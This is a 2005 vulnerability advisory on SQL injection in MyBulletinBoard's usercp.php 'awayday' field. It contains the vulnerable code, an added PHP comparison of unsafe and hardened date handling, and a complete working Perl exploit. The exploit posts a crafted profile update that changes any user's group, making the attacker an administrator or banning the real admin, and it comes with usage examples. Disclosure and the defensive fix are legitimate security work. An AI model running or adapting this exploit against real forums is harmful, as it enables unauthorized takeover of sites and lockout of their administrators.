SQL-Injection in MyBulletinBoard allows attacker to become a board admin.

2005-10-27T00:00:00
ID SECURITYVULNS:DOC:10053
Type securityvulns
Reporter Securityvulns
Modified 2005-10-27T00:00:00

Description

Vendor: www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and maybe prior.
Script: usercp.php
Code:

> if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != "no")
> {
> [...]
> $returndate = $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
> [...]
> $newprofile = array(
>     "website" => addslashes(htmlspecialchars($mybb->input['website'])),
>     "icq" => intval($mybb->input['icq']),
>     "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
>     "yahoo" => addslashes(htmlspecialchars($mybb->input['yahoo'])),
>     "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
>     "birthday" => $bday,
>     "away" => $away,
>     "awaydate" => $awaydate,
>     "returndate" => $returndate, // <--- not checked (bday too, but anyway)
>     "awayreason" => addslashes(htmlspecialchars($mybb->input['awayreason']))
> );
> [...]
> $db->update_query(TABLE_PREFIX."users", $newprofile, "uid='".$mybb->user['uid']."'");

So: an attacker can replace the "awayday" param with SQL code and change any field in the _users table. Changing "usergroup" for his "uid" to 4 makes him an admin. To use this bug the attacker has to be a registered/awaiting-activation user.
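As an added illustration (not MyBB's own code), the unchecked concatenation above next to a hardened version that casts each away-date component to an integer and validates the result with checkdate(); the sample inputs are constructed here, the first shaped like the payload quoted in the PoC below.

```php
<?php
// Added example, not MyBB's own code: the vulnerable pattern from usercp.php
// next to a hardened version of the returndate construction.

// Vulnerable: raw request fields are concatenated straight into the value that
// $db->update_query() later embeds in the UPDATE statement, quotes and all.
function build_returndate_unsafe(array $input): string
{
    return $input['awayday'] . "-" . $input['awaymonth'] . "-" . $input['awayyear'];
}

// Hardened: each component is cast to an integer and the triple must be a real
// calendar date, so only digits and dashes can ever reach the query string.
function build_returndate_safe(array $input)
{
    $day   = intval($input['awayday']   ?? 0);
    $month = intval($input['awaymonth'] ?? 0);
    $year  = intval($input['awayyear']  ?? 0);
    if (!checkdate($month, $day, $year)) {
        return false;   // reject the update instead of storing garbage
    }
    return sprintf('%d-%d-%d', $day, $month, $year);
}

// Constructed sample inputs (not captured traffic). The first mirrors the
// shape of the advisory's payload: a date followed by a SQL fragment.
$hostile = [
    'awayday'   => "1-1-2009', usergroup='4' WHERE uid='[ID]' /*",
    'awaymonth' => '1',
    'awayyear'  => '2009',
];
$bogus  = ['awayday' => '40', 'awaymonth' => '13', 'awayyear' => '2005'];
$benign = ['awayday' => '15', 'awaymonth' => '3',  'awayyear' => '2006'];

var_dump(build_returndate_unsafe($hostile)); // the SQL fragment passes through intact
var_dump(build_returndate_safe($hostile));   // intval() keeps only the leading digits
var_dump(build_returndate_safe($bogus));     // rejected: not a valid calendar date
var_dump(build_returndate_safe($benign));    // normal date, accepted
```

The same check belongs on the $bday value the original comment flags, and validated values should still go through the database layer's escaping rather than rely on this cast alone.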

Proof of concept: (For PR2 only)

--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl
#
# MyBB Preview Release 2 SQL-Injection PoC ExPlOiT
# ------------------------------------------------
# To use this you have to be registered member on
# a target.
# ------------------------------------------------
# Glossary:
#   [MYBBUSER] - name of the field in cookie;
#   [YOUR_ID]  - your uid :)
#   [ID]       - victim uid
# Available groups:
#   1 - Unregistered / Not Logged In
#   2 - Registered
#   3 - Super Moderators
#   4 - Administrators
#   5 - Awayting Activation
#   6 - Moderators
#   7 - Banned
# ------------------------------------------------
# Examples:
#   1) TROUBLE --> U need an admin privileges.
#      USAGE   --> mybbpr2.pl -u [MYBBUSER] -i [YOUR_ID] -g 4 server /mybb/
#   2) TROUBLE --> U need to ban real admin.
#      USAGE   --> mybbpr2.pl -u [MYBBUSER] -i [ID] -g 7 server /mybb/

use IO::Socket;

$tmp=0;
while($tmp<@ARGV)
{
    if($ARGV[$tmp] eq "-u") { $mbuser=$ARGV[$tmp+1]; $tmp++; }
    if($ARGV[$tmp] eq "-i") { $id=$ARGV[$tmp+1]; $tmp++; }
    if($ARGV[$tmp] eq "-g") { $ugr=$ARGV[$tmp+1]; $tmp++; }
    if($ARGV[$tmp] eq "-h") { &f_help(); }
    $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr) { &f_die("Some options aren't specified"); }
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target", PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ".length($str)."\n\n$str\n";
while(<$sock>)
{
    if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

# ----------------------------------
#        S u B r O u T i N e
# ----------------------------------
sub f_help()
{
    print q(
 Usage: mybbpr2.pl <OPTIONS> SERVER PATH
 Options:
   -u USERKEY   mybbuser field from cookie.
   -i UID       User's uid. (Change group 4 this user)
   -g GROUP     New usergroup. (1-7)
   -h           Displays this help.
);
    exit(-1);
}

sub f_die($) { print "\r\nERROR: $_[0]\r\n"; exit(-1); }
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 Sept 2005. Don't remember. Updated package is available (I hope).

ByE.